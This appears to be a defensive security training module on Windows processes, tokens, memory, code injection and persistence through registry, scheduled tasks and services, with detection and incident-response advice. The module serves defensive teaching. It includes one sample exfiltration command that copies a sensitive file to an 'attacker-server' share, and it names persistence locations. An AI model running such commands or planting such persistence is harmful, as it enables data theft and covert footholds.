Process, Memory & Persistence Mechanisms

🎯 Process Creation Model: Attack Chain Visibility

Parent-Child Process Relationships

Every process (except System) has parent process that spawned it. Windows maintains these relationships. Process creation often follows patterns: explorer.exe (Windows Explorer) spawns cmd.exe (Command Prompt), cmd.exe spawns notepad.exe. This is normal. However, anomalous spawning indicates compromise: System spawning cmd.exe (System should not spawn shells), Office application spawning calc.exe then cmd.exe (Office should not spawn shell), user application spawning powershell.exe with suspicious arguments.

Process Identifiers (PID) and Lifecycle

Each process assigned unique Process ID (PID) when created. PIDs reused after process terminates. This identifier is critical for process monitoring: track which PID created files, opened network connections, accessed registry. Process lifecycle: created → running → terminated. Monitoring process creation/termination events provides visibility into executed programs. Rapid process spawning (1000+ processes created in minute) indicates scanning or exploitation attempt.

Command-Line Arguments and Detection

Programs receive command-line arguments specifying execution parameters. Example: notepad.exe C:\secret.txt tells Notepad to open specific file. Malware often passes suspicious arguments: encoded payloads, URLs, exploitation parameters. Monitoring command-line arguments detects lateral movement attempts, exploitation, data exfiltration. Example: cmd.exe /c copy C:\sensitive.xlsx \\\\attacker-server\\share indicates file theft attempt.

👥 Security Tokens: Process Identity and Privileges

What Are Security Tokens?

Security token is data structure containing process identity and privileges. Token answers questions: Which user owns this process? What groups is user member of? What privileges does process have (administrator, backup, debug)? OS checks token before allowing resource access. Example: if process wants to read file, OS checks process token. Does token contain user who owns file or group who owns file? Does process have backup privilege (allows bypassing normal ACLs)? Based on token, access granted or denied.

User-Mode vs SYSTEM Token

User-mode process runs with user's security context. Unprivileged user token has limited privileges. Cannot modify system files, cannot load unsigned drivers, cannot directly access hardware. SYSTEM token has all privileges and can do anything on system. This is why privilege escalation is critical attack step. Malware running as unprivileged user attempts to escalate to SYSTEM by exploiting vulnerability. Once elevated, malware can disable security tools, modify system files, install rootkit.

Session Isolation

Each logged-in user has isolated session. Session 0 reserved for system services (runs SYSTEM). Session 1+ for user logins. Process in session 1 cannot access Session 0 processes—even if same computer. Multiple users logged in simultaneously have completely isolated sessions. This prevents one user's malware from attacking another user's session. However, malware in Session 0 (running as SYSTEM) can attack any user session.

🏗️ Memory Architecture and Regions

Process Memory Layout

Process memory organized into regions: Code (executable), Data (initialized globals), BSS (uninitialized globals), Heap (dynamic allocation), Stack (function calls, local variables). Each region has protection: Code region typically execute-only (prevent modification), Data/Heap regions writable, Stack grows downward. Protection enforcement by Memory Management Unit at hardware level. Modern systems implement randomization of memory layout (ASLR) making exploitation more difficult because attacker cannot predict code locations.

Heap and Stack Exploitation

Heap stores dynamically allocated memory. Buffer overflow in heap can corrupt adjacent allocations, potentially leading to code execution. Stack stores function call frames. Stack-based buffer overflow can overwrite return address, redirecting execution to attacker code. Both heap and stack vulnerabilities are attack vectors. Modern protections: Stack canaries (detect overwrites), DEP (prevent code execution from stack/heap), ASLR (randomize layouts). Despite protections, vulnerabilities still exploitable—Windows keeps shipping kernel patches.

Memory Protection Attributes

Each memory page has protection: READ, WRITE, EXECUTE. Page can be readable (process can read), writable (process can write), executable (process can execute as code). Combining protections: code pages typically PAGE_EXECUTE_READ (readable and executable), data pages typically PAGE_READWRITE (readable and writable). Modern systems enforce strict separation: code non-writable (prevent modification), data non-executable (prevent execution). Malware attempting to execute from data or write to code encounters access violation fault.

⚠️ Code Injection: Conceptual Understanding

Why Malware Uses Injection

Malware injection into legitimate process provides cover. Instead of separate malware process, malicious code runs inside calc.exe, notepad.exe, or other legitimate process. User sees legitimate process, not malware process. Security monitoring tools often focus on unusual processes—legitimate process name provides camouflage. Additionally, injected code runs with privileges of target process—malware can gain higher privileges by injecting into elevated process.

Injection Indicators

Injected code presence detectable through forensic analysis: unusual DLL loading (DLL not normally loaded by legitimate process), memory pages with suspicious protections (PAGE_EXECUTE_READWRITE), unusual imported functions (process imports functions it doesn't normally need), multiple threads in unexpected processes. Memory forensics tools can examine process memory, identify injected regions, extract injected code for analysis.

Detection Challenges

Injected code runs in legitimate process context—difficult to distinguish from legitimate code to untrained analysis. Sophisticated malware uses anti-analysis techniques: detecting debuggers, detecting virtualization, refusing execution in analysis environments. Understanding legitimate process behavior (baseline), recognizing deviation patterns, and leveraging OS event logs enables detection despite these challenges.

📋 Registry-Based Persistence (Conceptual)

Why Registry for Persistence?

Registry is system database storing configuration: startup programs, installed services, user preferences, security settings. Registry survives reboots—data persists across shutdowns. If malware stores execution instruction in registry startup location, instruction re-executes on next reboot. This achieves persistence: malware disappears from running processes (can be terminated), but reappears after reboot because registry instruction still present.

Common Persistence Locations (Conceptual)

Run Keys: Registry keys like HKLM\Software\Microsoft\Windows\CurrentVersion\Run contain programs that automatically execute on system startup. Legitimate programs use these for startup tools, background services. Malware modifies these keys to auto-execute malicious code. Explorer Shell Extensions: Registry can specify shell extensions—code that loads whenever Windows Explorer opens. Malware uses these to ensure persistence every time user opens file browser.

Detection and Response

Monitoring registry modifications detects persistence establishment. EDR tools track registry changes in real-time. Suspicious modifications: new values in Run keys, unexpected shell extensions, services pointing to suspicious executables. Response: identify registry key modification timestamp, determine attacker entry point, quarantine malicious executable, remove registry entries, rebuild if persistence deeply established.

⏰ Scheduled Tasks Persistence

Windows Task Scheduler

Windows Task Scheduler is legitimate system component for scheduling program execution. Tasks defined in XML stored on disk. Task Scheduler checks time/conditions, executes task when triggered. Tasks survive reboots—if task configured to run at startup or regularly, it re-executes persistently. Malware abuse: create scheduled task executing malware binary, task executes persistently on schedule.

Scheduled Task Abuse Indicators

Unusual tasks executing at suspicious times, tasks executing malware binaries, tasks created during off-hours (indicates attacker activity, not admin maintenance), tasks with system privileges performing suspicious actions. Task metadata includes creation timestamp—comparing with breach timeline indicates whether task created during intrusion or before. Tasks stored in C:\Windows\System32\Tasks—forensic analysis reveals task configuration.

Enterprise Detection

EDR tools monitor task creation events. Monitoring should flag: tasks created/modified by non-admin users, tasks executing from unusual locations (Downloads, Temp), tasks executing with suspicious command-line arguments, task execution frequency anomalies. Incident response: export task XML, analyze execution history, determine if task legitimate or malicious, remove task, terminate related processes.

🔧 Windows Service Persistence

What Are Services?

Windows Services are long-running background processes managed by Service Control Manager. Services run automatically on system startup, run with system-defined privileges (often SYSTEM), survive logoffs. Services configured in registry: HKLM\System\CurrentControlSet\Services. Legitimate services: Windows Update, Antivirus, Print Spooler. Malware abuse: install malicious service, service executes automatically with SYSTEM privilege on reboot.

Service Installation and Execution

Malware typically uses administrative tool (sc.exe) to install malicious service. Service configuration specifies executable path and startup type (automatic, manual, disabled). When system reboots, Service Control Manager starts automatic services—if service points to malware binary, malware automatically executed with potentially SYSTEM privilege. Service runs persistently as long as binary exists and service configuration present.

Service-Based Persistence Indicators

Suspicious services: services created recently (timestamp indicates attack timeframe), services pointing to executables in unusual locations (Downloads, Temp, user profile instead of System32), services with suspicious descriptions (generic descriptions or descriptions mimicking legitimate services), services with disabled status change events or excessive restarts indicating system instability.

📊 Baseline Behavior Establishment

Enterprise baseline is documented normal behavior: standard processes running, standard services active, standard registry configurations, standard scheduled tasks. Baseline typically established from representative healthy systems. With baseline documented, deviations are anomalies potentially indicating compromise.

Example: On user workstations, svchost.exe (Windows service hosting) is common service. Monitoring shows svchost.exe always running. Alert only for svchost.exe behavior deviation: svchost.exe spawning child processes (abnormal—svchost should not spawn processes), svchost.exe performing network connections to external IPs (abnormal—should connect internally), svchost.exe accessing files in user profile (abnormal—should not access user data).

🔍 Persistence Artifact Monitoring Strategy

Continuous Registry Monitoring

EDR tools monitor registry modifications in real-time. Monitoring focuses on high-risk locations: Run keys (HKLM/HKCU Run*), Explorer shell extensions, services registry hive, AppInit_DLLs, COM object registrations. Alerts trigger on modifications to these locations, enabling rapid response to persistence establishment attempts. Monitoring includes: who made modification (process and user), timestamp, modification details (value added/changed/deleted).

Process Creation Chain Analysis

Monitoring unexpected process creation chains detects malware execution. Chain analysis: is parent process legitimate? Is spawned process expected? Are command-line arguments suspicious? Example anomalies: Services.exe spawning cmd.exe (Services should not spawn shells), explorer.exe spawning services (Explorer should not install services), Office application spawning rundll32.exe multiple times (Office should not spawn rundll32 repeatedly—indicator of DLL injection attack).

File Integrity Monitoring

Monitoring system file modifications detects malware persistence mechanisms. Critical areas: System32 directory, scheduled tasks directory (C:\Windows\System32\Tasks), registry hive files. Modifications to these directories are serious red flag. File integrity monitoring compares current state to baseline: unexpected new files, unexpected modifications to existing files, unexpected deletions.

🎯 Incident Response Workflow

Upon persistence detection, incident response workflow:

• Isolate System: Disconnect from network to prevent lateral movement, prevent data exfiltration
• Preserve Evidence: Memory dump, disk image, collect logs before remediation
• Identify Persistence: Registry analysis, service enumeration, scheduled task review, DLL injection detection
• Trace Attacker Activity: Process tree analysis, file access logs, network connections, timeline reconstruction
• Comprehensive Removal: Remove all persistence mechanisms, quarantine malware binaries, rebuild if necessary
• Verification: Monitor system for persistence re-establishment indicating incomplete removal
• Post-Incident: Root cause analysis, patch exploited vulnerabilities, update monitoring rules

📚 Microsoft Official Process and Memory Documentation

• Processes and Threads - Process creation model, thread management, process synchronization
• Access Control - Security tokens, access tokens, privilege checking mechanism
• Memory Management - Virtual memory, page protection, heap management
• Dynamic Link Libraries - DLL architecture, DLL loading, DLL dependencies
• Services - Windows service architecture, service configuration, service lifecycle
• Task Scheduler - Scheduled task architecture, task configuration, task triggers
• Registry - Registry structure, registry hives, registry persistence locations

Module 2 Summary - Malware Behavior Analysis Mastered:
✅ Process creation models and parent-child relationship analysis
✅ Security token concepts and privilege understanding
✅ Memory management and virtual address space isolation
✅ DLL loading mechanisms and injection awareness
✅ Registry-based, scheduled task, and service persistence concepts
✅ Persistence artifact detection and monitoring strategies

You now understand how malware executes within processes, manipulates memory, and establishes persistence. Module 3 covers advanced attack techniques, lateral movement detection, and complete incident response procedures. Your mastery of these core concepts combined with advanced techniques will make you expert-level threat analyst.